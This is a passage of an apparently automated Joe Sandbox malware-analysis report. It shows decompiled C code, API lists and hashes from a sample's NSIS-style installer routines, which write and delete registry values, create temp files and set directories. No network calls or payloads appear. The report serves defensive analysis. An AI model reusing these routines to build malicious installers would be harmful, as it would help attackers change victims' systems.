                                                              0x00402f37
                                                              0x00000000
                                                              0x00000000
                                                              0x00402f3f
                                                              0x00402f44
                                                              0x00402f45
                                                              0x00402f45
                                                              0x00402f52
                                                              0x00402f5a
                                                              0x00402f61
                                                              0x00000000
                                                              0x00402f8a
                                                              0x00000000
                                                              0x00402f69
                                                              0x00402ef5
                                                              0x00402f08
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00402f08
                                                              0x00402f90

                                                              APIs
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CloseEnum$DeleteValue
                                                              • String ID:
                                                              • API String ID: 1354259210-0
                                                              • Opcode ID: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
                                                              • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                              • Opcode Fuzzy Hash: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
                                                              • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 891 6f671817-6f671856 call 6f671bff 895 6f671976-6f671978 891->895 896 6f67185c-6f671860 891->896 897 6f671862-6f671868 call 6f67243e 896->897 898 6f671869-6f671876 call 6f672480 896->898 897->898 903 6f6718a6-6f6718ad 898->903 904 6f671878-6f67187d 898->904 905 6f6718af-6f6718cb call 6f672655 call 6f671654 call 6f671312 GlobalFree 903->905 906 6f6718cd-6f6718d1 903->906 907 6f67187f-6f671880 904->907 908 6f671898-6f67189b 904->908 929 6f671925-6f671929 905->929 912 6f6718d3-6f67191c call 6f671666 call 6f672655 906->912 913 6f67191e-6f671924 call 6f672655 906->913 910 6f671882-6f671883 907->910 911 6f671888-6f671889 call 6f672b98 907->911 908->903 914 6f67189d-6f67189e call 6f672e23 908->914 917 6f671885-6f671886 910->917 918 6f671890-6f671896 call 6f672810 910->918 925 6f67188e 911->925 912->929 913->929 922 6f6718a3 914->922 917->903 917->911 928 6f6718a5 918->928 922->928 925->922 928->903 933 6f671966-6f67196d 929->933 934 6f67192b-6f671939 call 6f672618 929->934 933->895 939 6f67196f-6f671970 GlobalFree 933->939 941 6f671951-6f671958 934->941 942 6f67193b-6f67193e 934->942 939->895 941->933 944 6f67195a-6f671965 call 6f6715dd 941->944 942->941 943 6f671940-6f671948 942->943 943->941 945 6f67194a-6f67194b FreeLibrary 943->945 944->933 945->941
                                                              C-Code - Quality: 88%
                                                              			E6F671817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                              				void _v36;
                                                              				char _v136;
                                                              				struct HINSTANCE__* _t37;
                                                              				intOrPtr _t42;
                                                              				void* _t48;
                                                              				void* _t49;
                                                              				void* _t50;
                                                              				void* _t54;
                                                              				intOrPtr _t57;
                                                              				signed int _t61;
                                                              				signed int _t63;
                                                              				void* _t67;
                                                              				void* _t68;
                                                              				void* _t72;
                                                              				void* _t76;
                                                              
                                                              				_t76 = __esi;
                                                              				_t68 = __edi;
                                                              				_t67 = __edx;
                                                              				 *0x6f67506c = _a8;
                                                              				 *0x6f675070 = _a16;
                                                              				 *0x6f675074 = _a12;
                                                              				 *((intOrPtr*)(_a20 + 0xc))( *0x6f675048, E6F671651);
                                                              				_push(1); // executed
                                                              				_t37 = E6F671BFF(); // executed
                                                              				_t54 = _t37;
                                                              				if(_t54 == 0) {
                                                              					L28:
                                                              					return _t37;
                                                              				} else {
                                                              					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                              						E6F67243E(_t54);
                                                              					}
                                                              					_push(_t54);
                                                              					E6F672480(_t67);
                                                              					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                              					if(_t57 == 0xffffffff) {
                                                              						L14:
                                                              						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                              							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                              								_push(_t54);
                                                              								_t37 = E6F672655();
                                                              							} else {
                                                              								_push(_t76);
                                                              								_push(_t68);
                                                              								_t61 = 8;
                                                              								_t13 = _t54 + 0x1018; // 0x1018
                                                              								memcpy( &_v36, _t13, _t61 << 2);
                                                              								_t42 = E6F671666(_t54,  &_v136);
                                                              								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                              								_t18 = _t54 + 0x1018; // 0x1018
                                                              								_t72 = _t18;
                                                              								_push(_t54);
                                                              								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                              								 *_t72 = 4;
                                                              								E6F672655();
                                                              								_t63 = 8;
                                                              								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                              							}
                                                              						} else {
                                                              							_push(_t54);
                                                              							E6F672655();
                                                              							_t37 = GlobalFree(E6F671312(E6F671654(_t54)));
                                                              						}
                                                              						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                              							_t37 = E6F672618(_t54);
                                                              							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                              								_t37 =  *(_t54 + 0x1008);
                                                              								if(_t37 != 0) {
                                                              									_t37 = FreeLibrary(_t37);
                                                              								}
                                                              							}
                                                              							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                              								_t37 = E6F6715DD( *0x6f675068);
                                                              							}
                                                              						}
                                                              						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                              							goto L28;
                                                              						} else {
                                                              							return GlobalFree(_t54);
                                                              						}
                                                              					}
                                                              					_t48 =  *_t54;
                                                              					if(_t48 == 0) {
                                                              						if(_t57 != 1) {
                                                              							goto L14;
                                                              						}
                                                              						E6F672E23(_t54);
                                                              						L12:
                                                              						_t54 = _t48;
                                                              						L13:
                                                              						goto L14;
                                                              					}
                                                              					_t49 = _t48 - 1;
                                                              					if(_t49 == 0) {
                                                              						L8:
                                                              						_t48 = E6F672B98(_t57, _t54); // executed
                                                              						goto L12;
                                                              					}
                                                              					_t50 = _t49 - 1;
                                                              					if(_t50 == 0) {
                                                              						E6F672810(_t54);
                                                              						goto L13;
                                                              					}
                                                              					if(_t50 != 1) {
                                                              						goto L14;
                                                              					}
                                                              					goto L8;
                                                              				}
                                                              			}


















                                                              0x6f671817
                                                              0x6f671817
                                                              0x6f671817
                                                              0x6f671824
                                                              0x6f67182c
                                                              0x6f671839
                                                              0x6f671847
                                                              0x6f67184a
                                                              0x6f67184c
                                                              0x6f671851
                                                              0x6f671856
                                                              0x6f671978
                                                              0x6f671978
                                                              0x6f67185c
                                                              0x6f671860
                                                              0x6f671863
                                                              0x6f671868
                                                              0x6f671869
                                                              0x6f67186a
                                                              0x6f671870
                                                              0x6f671876
                                                              0x6f6718a6
                                                              0x6f6718ad
                                                              0x6f6718d1
                                                              0x6f67191e
                                                              0x6f67191f
                                                              0x6f6718d3
                                                              0x6f6718d3
                                                              0x6f6718d4
                                                              0x6f6718dd
                                                              0x6f6718de
                                                              0x6f6718e8
                                                              0x6f6718eb
                                                              0x6f6718f0
                                                              0x6f6718f7
                                                              0x6f6718f7
                                                              0x6f6718fd
                                                              0x6f6718fe
                                                              0x6f671904
                                                              0x6f67190a
                                                              0x6f671917
                                                              0x6f671918
                                                              0x6f67191b
                                                              0x6f6718af
                                                              0x6f6718af
                                                              0x6f6718b0
                                                              0x6f6718c5
                                                              0x6f6718c5
                                                              0x6f671929
                                                              0x6f67192c
                                                              0x6f671939
                                                              0x6f671940
                                                              0x6f671948
                                                              0x6f67194b
                                                              0x6f67194b
                                                              0x6f671948
                                                              0x6f671958
                                                              0x6f671960
                                                              0x6f671965
                                                              0x6f671958
                                                              0x6f67196d
                                                              0x00000000
                                                              0x6f67196f
                                                              0x00000000
                                                              0x6f671970
                                                              0x6f67196d
                                                              0x6f67187a
                                                              0x6f67187d
                                                              0x6f67189b
                                                              0x00000000
                                                              0x00000000
                                                              0x6f67189e
                                                              0x6f6718a3
                                                              0x6f6718a3
                                                              0x6f6718a5
                                                              0x00000000
                                                              0x6f6718a5
                                                              0x6f67187f
                                                              0x6f671880
                                                              0x6f671888
                                                              0x6f671889
                                                              0x00000000
                                                              0x6f671889
                                                              0x6f671882
                                                              0x6f671883
                                                              0x6f671891
                                                              0x00000000
                                                              0x6f671891
                                                              0x6f671886
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x6f671886

                                                              APIs
                                                                • Part of subcall function 6F671BFF: GlobalFree.KERNEL32(?), ref: 6F671E74
                                                                • Part of subcall function 6F671BFF: GlobalFree.KERNEL32(?), ref: 6F671E79
                                                                • Part of subcall function 6F671BFF: GlobalFree.KERNEL32(?), ref: 6F671E7E
                                                              • GlobalFree.KERNEL32(00000000), ref: 6F6718C5
                                                              • FreeLibrary.KERNEL32(?), ref: 6F67194B
                                                              • GlobalFree.KERNEL32(00000000), ref: 6F671970
                                                                • Part of subcall function 6F67243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6F67246F
                                                                • Part of subcall function 6F672810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F671896,00000000), ref: 6F6728E0
                                                                • Part of subcall function 6F671666: wsprintfW.USER32 ref: 6F671694
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62505218441.000000006F671000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F670000, based on PE: true
                                                              • Associated: 00000001.00000002.62505168749.000000006F670000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505286401.000000006F674000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505338915.000000006F676000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6f670000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                              • String ID:
                                                              • API String ID: 3962662361-3916222277
                                                              • Opcode ID: 340727fa4b38c3c497485e3c48fa5d24df0671f5f65503edab57ebddfbee0cf9
                                                              • Instruction ID: 9dd9dba8ad250660f0fdfa9bedf718a71d2cb24e974ee81a1921f77fe6cc8a40
                                                              • Opcode Fuzzy Hash: 340727fa4b38c3c497485e3c48fa5d24df0671f5f65503edab57ebddfbee0cf9
                                                              • Instruction Fuzzy Hash: A441A0718003459BDF349F35D8A8BD677A8BF06318F044567E954AA0C6DFB4E485CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 948 40248a-4024bb call 402da6 * 2 call 402e36 955 4024c1-4024cb 948->955 956 402c2a-402c39 948->956 958 4024cd-4024da call 402da6 lstrlenW 955->958 959 4024de-4024e1 955->959 958->959 962 4024e3-4024f4 call 402d84 959->962 963 4024f5-4024f8 959->963 962->963 966 402509-40251d RegSetValueExW 963->966 967 4024fa-402504 call 403371 963->967 969 402522-402603 RegCloseKey 966->969 970 40251f 966->970 967->966 969->956 970->969
                                                              C-Code - Quality: 85%
                                                              			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                                              				void* _t20;
                                                              				void* _t21;
                                                              				int _t24;
                                                              				long _t25;
                                                              				char _t27;
                                                              				int _t30;
                                                              				void* _t32;
                                                              				intOrPtr _t33;
                                                              				void* _t34;
                                                              				intOrPtr _t37;
                                                              				void* _t39;
                                                              				void* _t42;
                                                              
                                                              				_t42 = __eflags;
                                                              				_t33 = __edx;
                                                              				_t30 = __ebx;
                                                              				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                                              				_t34 = __eax;
                                                              				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                              				 *(_t39 - 0x44) = E00402DA6(2);
                                                              				_t20 = E00402DA6(0x11);
                                                              				 *(_t39 - 4) = 1;
                                                              				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
                                                              				 *(_t39 + 8) = _t21;
                                                              				if(_t21 != __ebx) {
                                                              					_t24 = 0;
                                                              					if(_t37 == 1) {
                                                              						E00402DA6(0x23);
                                                              						_t24 = lstrlenW(0x40b5f8) + _t29 + 2;
                                                              					}
                                                              					if(_t37 == 4) {
                                                              						_t27 = E00402D84(3);
                                                              						_pop(_t32);
                                                              						 *0x40b5f8 = _t27;
                                                              						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                              						_t24 = _t37;
                                                              					}
                                                              					if(_t37 == 3) {
                                                              						_t24 = E00403371(_t32,  *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f8, 0x1800); // executed
                                                              					}
                                                              					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f8, _t24); // executed
                                                              					if(_t25 == 0) {
                                                              						 *(_t39 - 4) = _t30;
                                                              					}
                                                              					_push( *(_t39 + 8));
                                                              					RegCloseKey(); // executed
                                                              				}
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                                              				return 0;
                                                              			}















                                                              0x0040248a
                                                              0x0040248a
                                                              0x0040248a
                                                              0x0040248a
                                                              0x0040248d
                                                              0x00402494
                                                              0x0040249e
                                                              0x004024a1
                                                              0x004024aa
                                                              0x004024b1
                                                              0x004024b8
                                                              0x004024bb
                                                              0x004024c1
                                                              0x004024cb
                                                              0x004024cf
                                                              0x004024da
                                                              0x004024da
                                                              0x004024e1
                                                              0x004024e5
                                                              0x004024ea
                                                              0x004024eb
                                                              0x004024f1
                                                              0x004024f4
                                                              0x004024f4
                                                              0x004024f8
                                                              0x00402504
                                                              0x00402504
                                                              0x00402515
                                                              0x0040251d
                                                              0x0040251f
                                                              0x0040251f
                                                              0x00402522
                                                              0x004025fd
                                                              0x004025fd
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi821.tmp,00000023,00000011,00000002), ref: 004024D5
                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsi821.tmp,00000000,00000011,00000002), ref: 00402515
                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsi821.tmp,00000000,00000011,00000002), ref: 004025FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CloseValuelstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsi821.tmp
                                                              • API String ID: 2655323295-4246722114
                                                              • Opcode ID: 9c86e53f0ab96bac3dc9ba6bf3699c46313c21c8edda6fdc1e85d5f454bbf74d
                                                              • Instruction ID: a516967871aadb8e7373f7254d3c24ec0cdbd982f2b4049ed7d94b0996b6da2b
                                                              • Opcode Fuzzy Hash: 9c86e53f0ab96bac3dc9ba6bf3699c46313c21c8edda6fdc1e85d5f454bbf74d
                                                              • Instruction Fuzzy Hash: 4011AF71E00108BEEF10AFA1CE49EAEB6B8EB44354F11443AF404B61C1DBB98D409658
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 973 406187-406193 974 406194-4061c8 GetTickCount GetTempFileNameW 973->974 975 4061d7-4061d9 974->975 976 4061ca-4061cc 974->976 977 4061d1-4061d4 975->977 976->974 978 4061ce 976->978 978->977
                                                              C-Code - Quality: 100%
                                                              			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                              				intOrPtr _v8;
                                                              				short _v12;
                                                              				short _t12;
                                                              				intOrPtr _t13;
                                                              				signed int _t14;
                                                              				WCHAR* _t17;
                                                              				signed int _t19;
                                                              				signed short _t23;
                                                              				WCHAR* _t26;
                                                              
                                                              				_t26 = _a4;
                                                              				_t23 = 0x64;
                                                              				while(1) {
                                                              					_t12 =  *L"nsa"; // 0x73006e
                                                              					_t23 = _t23 - 1;
                                                              					_v12 = _t12;
                                                              					_t13 =  *0x40a5ac; // 0x61
                                                              					_v8 = _t13;
                                                              					_t14 = GetTickCount();
                                                              					_t19 = 0x1a;
                                                              					_v8 = _v8 + _t14 % _t19;
                                                              					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                              					if(_t17 != 0) {
                                                              						break;
                                                              					}
                                                              					if(_t23 != 0) {
                                                              						continue;
                                                              					} else {
                                                              						 *_t26 =  *_t26 & _t23;
                                                              					}
                                                              					L4:
                                                              					return _t17;
                                                              				}
                                                              				_t17 = _t26;
                                                              				goto L4;
                                                              			}












                                                              0x0040618d
                                                              0x00406193
                                                              0x00406194
                                                              0x00406194
                                                              0x00406199
                                                              0x0040619a
                                                              0x0040619d
                                                              0x004061a2
                                                              0x004061a5
                                                              0x004061af
                                                              0x004061bc
                                                              0x004061c0
                                                              0x004061c8
                                                              0x00000000
                                                              0x00000000
                                                              0x004061cc
                                                              0x00000000
                                                              0x004061ce
                                                              0x004061ce
                                                              0x004061ce
                                                              0x004061d1
                                                              0x004061d4
                                                              0x004061d4
                                                              0x004061d7
                                                              0x00000000

                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 004061A5
                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                              • API String ID: 1716503409-944333549
                                                              • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                              • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                              • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                              • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 86%
                                                              			E004015C1(short __ebx, void* __eflags) {
                                                              				void* _t17;
                                                              				int _t23;
                                                              				void* _t25;
                                                              				signed char _t26;
                                                              				short _t28;
                                                              				short _t31;
                                                              				short* _t34;
                                                              				void* _t36;
                                                              
                                                              				_t28 = __ebx;
                                                              				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                              				_t17 = E00405FE2(_t16);
                                                              				_t32 = _t17;
                                                              				if(_t17 != __ebx) {
                                                              					do {
                                                              						_t34 = E00405F64(_t32, 0x5c);
                                                              						_t31 =  *_t34;
                                                              						 *_t34 = _t28;
                                                              						if(_t31 != _t28) {
                                                              							L5:
                                                              							_t25 = E00405C16( *(_t36 + 8));
                                                              						} else {
                                                              							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                              							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                                                              								goto L5;
                                                              							} else {
                                                              								_t25 = E00405B99( *(_t36 + 8)); // executed
                                                              							}
                                                              						}
                                                              						if(_t25 != _t28) {
                                                              							if(_t25 != 0xb7) {
                                                              								L9:
                                                              								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                              							} else {
                                                              								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                              								if((_t26 & 0x00000010) == 0) {
                                                              									goto L9;
                                                              								}
                                                              							}
                                                              						}
                                                              						 *_t34 = _t31;
                                                              						_t32 = _t34 + 2;
                                                              					} while (_t31 != _t28);
                                                              				}
                                                              				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                              					_push(0xfffffff5);
                                                              					E00401423();
                                                              				} else {
                                                              					E00401423(0xffffffe6);
                                                              					E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp",  *(_t36 + 8));
                                                              					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                              					if(_t23 == 0) {
                                                              						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                              					}
                                                              				}
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                                              				return 0;
                                                              			}











                                                              0x004015c1
                                                              0x004015c9
                                                              0x004015cc
                                                              0x004015d1
                                                              0x004015d5
                                                              0x004015d7
                                                              0x004015df
                                                              0x004015e1
                                                              0x004015e4
                                                              0x004015ea
                                                              0x00401604
                                                              0x00401607
                                                              0x004015ec
                                                              0x004015ec
                                                              0x004015ef
                                                              0x00000000
                                                              0x004015fa
                                                              0x004015fd
                                                              0x004015fd
                                                              0x004015ef
                                                              0x0040160e
                                                              0x00401615
                                                              0x00401624
                                                              0x00401624
                                                              0x00401617
                                                              0x0040161a
                                                              0x00401622
                                                              0x00000000
                                                              0x00000000
                                                              0x00401622
                                                              0x00401615
                                                              0x00401627
                                                              0x0040162b
                                                              0x0040162c
                                                              0x004015d7
                                                              0x00401634
                                                              0x00401663
                                                              0x004022f1
                                                              0x00401636
                                                              0x00401638
                                                              0x00401645
                                                              0x0040164d
                                                              0x00401655
                                                              0x0040165b
                                                              0x0040165b
                                                              0x00401655
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                                • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,76083420,?,76082EE0,00405D94,?,76083420,76082EE0,00000000), ref: 00405FF0
                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                              • API String ID: 1892508949-670666241
                                                              • Opcode ID: 549c49a0165827fdc5d5d158968deb429f02c31064a37383ceaea4003741be7b
                                                              • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                              • Opcode Fuzzy Hash: 549c49a0165827fdc5d5d158968deb429f02c31064a37383ceaea4003741be7b
                                                              • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 53%
                                                              			E0040603F(void* __eflags, intOrPtr _a4) {
                                                              				int _t11;
                                                              				signed char* _t12;
                                                              				long _t16;
                                                              				intOrPtr _t18;
                                                              				intOrPtr* _t21;
                                                              				signed int _t23;
                                                              
                                                              				E00406668(0x425f50, _a4);
                                                              				_t21 = E00405FE2(0x425f50);
                                                              				if(_t21 != 0) {
                                                              					E004068EF(_t21);
                                                              					if(( *0x42a278 & 0x00000080) == 0) {
                                                              						L5:
                                                              						_t23 = _t21 - 0x425f50 >> 1;
                                                              						while(1) {
                                                              							_t11 = lstrlenW(0x425f50);
                                                              							_push(0x425f50);
                                                              							if(_t11 <= _t23) {
                                                              								break;
                                                              							}
                                                              							_t12 = E0040699E();
                                                              							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                              								E00405F83(0x425f50);
                                                              								continue;
                                                              							} else {
                                                              								goto L1;
                                                              							}
                                                              						}
                                                              						E00405F37();
                                                              						_t16 = GetFileAttributesW(??); // executed
                                                              						return 0 | _t16 != 0xffffffff;
                                                              					}
                                                              					_t18 =  *_t21;
                                                              					if(_t18 == 0 || _t18 == 0x5c) {
